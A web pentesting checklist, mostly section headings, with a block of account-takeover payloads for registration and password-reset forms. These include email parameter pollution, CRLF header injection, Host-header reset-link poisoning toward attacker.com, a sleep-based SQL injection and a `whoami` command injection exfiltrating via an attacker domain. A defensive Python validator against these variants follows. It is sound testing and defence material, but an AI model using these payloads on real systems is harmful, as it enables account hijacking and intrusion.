Pentesting Web Checklist V2

Recon phase

  • Large: a whole company with multiple domains

  • Medium: a single domain

  • Small: a single website

Large scope
Medium scope
Small scope
Network
Preparation
Information Gathering

User management

Registration
# Duplicate registration - check by varying the email:
uppercase
victim+1@mail.com
special characters in the email name (%00, %09, %20)
blank characters after the email: victim@mail.com a
victim@mail.com@attacker.com
victim@attacker.com@mail.com
Authentication / Login page
Profile / Account details / Change password page
Forgot / Reset password
# Parameter pollution, header injection and extra fields in the reset request:
email=victim@mail.com&email=attacker@mail.com
email=victim@mail.com%0a%0dcc:attacker@mail.com
email=victim@mail.com%0a%0dbcc:attacker@mail.com
email=victim@mail.com,attacker@mail.com
email=victim@mail.com%20attacker@mail.com
email=victim@mail.com|attacker@mail.com
email=victim@mail.com:attacker@mail.com
email[]=victim@mail.com&email[]=attacker@mail.com
email=victim@mail.com%0ACc:attacker@mail.com%0ABcc:attacker@mail.com
victim&email=attacker@mail.com
email=victim@mail.com&password=Mysecurepass123!
{"email":["victim@mail.com","attacker@mail.com"]}
{"email":"victim@mail.com","email":"attacker@mail.com"}

# Reset-link poisoning via the request line / Host header:
POST https://attacker.com/resetpassword HTTP/1.1
POST @attacker.com/resetpassword HTTP/1.1
POST :@attacker.com/resetpassword HTTP/1.1
POST /resetpassword@attacker.com HTTP/1.1
/resetpassword?%0d%0aHost:%20attacker.com

# SQL / command injection through the email field:
email=victim@mail.com'+(select*from(select(sleep(20)))a)+'
email=hello@`whoami`.attacker.com
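A defender-side counterpart to the registration and reset-password checks above, added here as an example and not part of the checklist: it rejects the multi-recipient, CRLF, second-'@' and metacharacter variants, detects parameter pollution and duplicate JSON keys, derives a dedup key for the existing-account lookup, and builds the reset link from a configured base URL instead of the Host header. The base URL, the '+tag' dedup policy and the shape of the `values` list are assumptions.

```python
import json
import re

# Deliberately stricter than RFC 5322: one '@', no whitespace/control chars/quotes/backticks/separators.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

class InvalidEmail(ValueError):
    """Raised for any value the registration / reset flow must not accept."""

def normalize_email(raw):
    """Validate one raw (already URL-decoded) email value; lowercase the domain."""
    if not isinstance(raw, str):  # JSON array or object where a string was expected
        raise InvalidEmail("email must be a single string")
    if len(raw) > 254 or any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw):
        raise InvalidEmail("over-long or contains control characters (CR/LF/NUL/TAB)")
    if raw.count("@") != 1 or not _EMAIL_RE.fullmatch(raw):
        raise InvalidEmail("malformed address")  # ',', '|', ':', ' ', 2nd '@', SQL/shell chars
    local, domain = raw.split("@")
    return f"{local}@{domain.lower()}"

def is_safe_email(raw):
    try:
        normalize_email(raw)
        return True
    except InvalidEmail:
        return False

def dedup_key(raw):
    """Existing-account lookup key. Assumed policy: case-insensitive local part, '+tag' stripped."""
    local, domain = normalize_email(raw).split("@")
    return f"{local.split('+', 1)[0].lower()}@{domain}"

def single_value(values):
    """Reject parameter pollution; `values` is every value collected for the 'email' key."""
    if len(values) != 1:  # email=a&email=b and email[]=a&email[]=b both yield two
        raise InvalidEmail("exactly one email value expected")
    return values[0]

def parse_json_strict(body):
    """json.loads that refuses duplicate keys instead of silently keeping the last one."""
    def no_dups(pairs):
        if len(pairs) != len({k for k, _ in pairs}):
            raise InvalidEmail("duplicate JSON key")
        return dict(pairs)
    return json.loads(body, object_pairs_hook=no_dups)

def build_reset_link(token, base_url="https://app.example.invalid"):
    """Build the link from a configured base URL (placeholder), never from Host or the request line."""
    return f"{base_url.rstrip('/')}/resetpassword?token={token}"
```

Run the raw values from the request through `single_value` and `normalize_email` before any lookup or mail is sent; the regex is intentionally narrower than what mail servers accept, so widen it only against your own user base.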
Input Handling
Error Handling
Application Logic

Other checks

Infrastructure
CAPTCHA
Security Headers
